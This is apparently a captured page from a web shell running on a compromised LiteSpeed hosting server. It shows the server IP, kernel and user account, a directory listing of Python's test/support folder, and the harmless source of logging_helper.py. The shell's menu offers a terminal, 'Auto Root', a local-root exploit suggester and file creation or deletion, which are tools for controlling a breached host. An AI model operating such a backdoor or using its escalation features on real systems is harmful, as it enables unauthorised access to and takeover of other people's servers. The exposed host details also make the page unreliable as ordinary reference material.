Linux server19.dn-server.com 3.10.0-962.3.2.lve1.5.88.el7.x86_64 #1 SMP Fri Sep 26 14:06:42 UTC 2025 x86_64
LiteSpeed
Server IP : 46.209.20.154 & Your IP : 216.73.217.39
Domains :
Cant Read [ /etc/named.conf ]
User : emadteam
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
python311 /
lib64 /
python3.11 /
test /
support /
Delete
Unzip
Name
Size
Permission
Date
Action
__pycache__
[ DIR ]
drwxr-xr-x
2025-07-23 21:45
__init__.py
72.97
KB
-rw-r--r--
2025-06-03 22:08
bytecode_helper.py
1.61
KB
-rw-r--r--
2025-06-03 22:08
hashlib_helper.py
1.86
KB
-rw-r--r--
2025-06-03 22:08
import_helper.py
9.85
KB
-rw-r--r--
2025-06-03 22:08
interpreters.py
5.69
KB
-rw-r--r--
2025-06-03 22:08
logging_helper.py
916
B
-rw-r--r--
2025-06-03 22:08
os_helper.py
22.32
KB
-rw-r--r--
2025-06-03 22:08
pty_helper.py
2.98
KB
-rw-r--r--
2025-06-03 22:08
script_helper.py
11.44
KB
-rw-r--r--
2025-06-03 22:08
socket_helper.py
13.1
KB
-rw-r--r--
2025-06-03 22:08
threading_helper.py
7.7
KB
-rw-r--r--
2025-06-03 22:08
warnings_helper.py
6.69
KB
-rw-r--r--
2025-06-03 22:08
Save
Rename
import logging.handlers class TestHandler(logging.handlers.BufferingHandler): def __init__(self, matcher): # BufferingHandler takes a "capacity" argument # so as to know when to flush. As we're overriding # shouldFlush anyway, we can set a capacity of zero. # You can call flush() manually to clear out the # buffer. logging.handlers.BufferingHandler.__init__(self, 0) self.matcher = matcher def shouldFlush(self): return False def emit(self, record): self.format(record) self.buffer.append(record.__dict__) def matches(self, **kwargs): """ Look for a saved dict whose keys/values match the supplied arguments. """ result = False for d in self.buffer: if self.matcher.matches(d, **kwargs): result = True break return result